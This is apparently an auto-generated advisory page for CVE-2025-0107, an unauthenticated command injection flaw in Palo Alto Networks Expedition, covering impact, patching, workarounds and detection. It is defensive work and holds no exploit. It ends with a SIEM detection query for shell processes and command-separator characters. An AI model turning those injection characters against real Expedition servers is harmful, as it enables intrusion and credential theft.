CVE-2025-0107
📋 TL;DR
An unauthenticated OS command injection vulnerability in Palo Alto Networks Expedition allows attackers to execute arbitrary commands as the www-data user. This can lead to theft of sensitive data including cleartext passwords, device configurations, and API keys for PAN-OS firewalls. Organizations using Expedition for firewall migration and management are affected.
💻 Affected Systems
- Palo Alto Networks Expedition
📦 What is this software?
Expedition by Paloaltonetworks
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of Expedition server leading to credential theft, lateral movement to managed firewalls, and potential network-wide compromise.
Likely Case
Data exfiltration of firewall credentials and configurations, enabling further attacks against the firewall infrastructure.
If Mitigated
Limited impact if Expedition is isolated, monitored, and access is restricted to trusted networks only.
🎯 Exploit Status
OS command injection vulnerabilities are typically easy to exploit once the injection point is identified.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check PAN-SA-2025-0001 for specific fixed version
Vendor Advisory: https://security.paloaltonetworks.com/PAN-SA-2025-0001
Restart Required: Yes
Instructions:
1. Review PAN-SA-2025-0001 advisory. 2. Download and install the fixed Expedition version from Palo Alto support portal. 3. Restart Expedition services. 4. Verify no unauthorized changes occurred pre-patch.
🔧 Temporary Workarounds
Network Isolation
allRestrict network access to Expedition to only trusted management networks
Configure firewall rules to limit Expedition access to specific source IPs/networks
Access Control
allImplement additional authentication layers before Expedition
Deploy VPN or reverse proxy with authentication in front of Expedition
🧯 If You Can't Patch
- Immediately isolate Expedition from internet and restrict to minimal necessary internal access
- Monitor Expedition logs aggressively for suspicious command execution patterns
🔍 How to Verify
Check if Vulnerable:
Check Expedition version against advisory PAN-SA-2025-0001. If pre-fix version, assume vulnerable.Check Version:
Check Expedition web interface or appliance management console for version informationVerify Fix Applied:
Verify Expedition version matches or exceeds the fixed version specified in PAN-SA-2025-0001📡 Detection & Monitoring
Log Indicators:
- Unusual command execution in Expedition logs
- Unexpected www-data user activity
- Suspicious outbound connections from Expedition
Network Indicators:
- Unexpected traffic from Expedition to external IPs
- Anomalous authentication attempts from Expedition to managed firewalls
SIEM Query:
source="expedition" AND (process="bash" OR process="sh" OR cmdline="*;*" OR cmdline="*|*" OR cmdline="*`*`)